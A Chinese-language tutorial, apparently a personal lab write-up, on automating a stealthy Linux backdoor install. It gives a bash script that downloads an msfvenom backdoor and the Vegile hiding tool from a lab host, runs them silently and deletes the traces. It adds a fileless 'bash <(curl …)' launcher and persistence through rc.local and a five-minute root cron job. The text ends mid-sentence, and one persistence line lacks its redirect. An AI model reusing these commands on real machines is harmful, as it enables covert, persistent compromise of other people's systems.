利用bash脚本自动化创建linux后门

思路
1.准备好木马程序backdoor放到/var/www/html目录下。
2.编写自动化脚本

1)在/var/www/html下创建脚本
2) 切换到工作目录
3) 用&&命令符把vegile执行后门命令的步骤用&&拼接。&&上一条执行成功后再执行&&后的下一条。
4) 因为vegile有个步骤是按任意键退出，所以需要使用到命令符echo y |
5.) 因为要隐蔽进行，不能显示输出结果，所以要用到命令>> /dev/null 2>&1
6) 最后删除vegile的所有包

3.执行自动化命令bash < (curl -s -L http://192.168.72.131/autobackdoor.sh) >> /dev/null 2>&1
4.也可以将后门执行命令添加到开机启动项

实验开始
1.准备后门，用msfvenom编写了一个backdoor的后门。上传了Vegile-master.zip。

2.编写bash自动化脚本

代码如下：

#切换目录
cd /tmp/
#将Vegile隐藏执行后门的步骤用&&连接
#隐藏执行命令 >> /dev/null 2>&1
#Velige中需要按任意键退出，所以使用命令 echo y |
wget 192.168.72.136/Vegile-master.zip && unzip Vegile-master.zip && cd Vegile-master && wget 192.168.72.136/backdoor && chmod +x Vegile && chmod +x backdoor && echo y | ./Vegile --i backdoor >> /dev/null 2>&1
#删除安装包
rm -rf /tmp/Vegile-master.zip   /tmp/Vegile-master

3.运行自动化脚本
代码如下：

bash <(curl -s -L http://192.168.72.136/autobackdoor.sh) >> /dev/null 2>&1

curl -s -L #curl 是一个利用 URL 语法在命令行下迚行文件传输的工具，这样好处是：本地丌会保存任何文件。
-s --silent #表示静默模式不输出任何内容
-L 跟 http 违接，组合使用的效果是把 http 违接中的文件下载到内存中，然后传 bash，迚行执行。
>> /dev/null 2>&1 不输出任何信息

4.也可以将后门执行命令添加到开机启动项
先给rc.load添加执行权限，因为有的centos的rc.load没有权限。
chmod +x /etc/rc.d/rc.local
添加到启动项中
echo "bash <(curl -s -L http://192.168.72.136/autobackdoor.sh) >> /dev/null 2>&1" /etc/rc.d/rc.local

5.也可以将后门添加到计划任务中

1.先给/etc/crontab授权。vim /etc/crontab
2.将后门执行命令添加到计划任务中。
*/5 * * * * root bash <(curl -s -L http://192.168.72.136/autobackdoor) >> /dev/null 2>&1 保存退出就可以了。表示每五分钟执行一次。
分 时 天 月 周
*/5 * * * *

注意：
分 时 天 月 周
*/5 * * * *

实验时犯的错：
1.获取shell的时候把set payload linux/x64/meterpreter/reverse_tcp中的x64写成了x86导致shell一直连接不上。
2.常把bash脚本的后缀名.sh忘掉。
3.在编写.sh脚本的时候，要注意以下这个坑。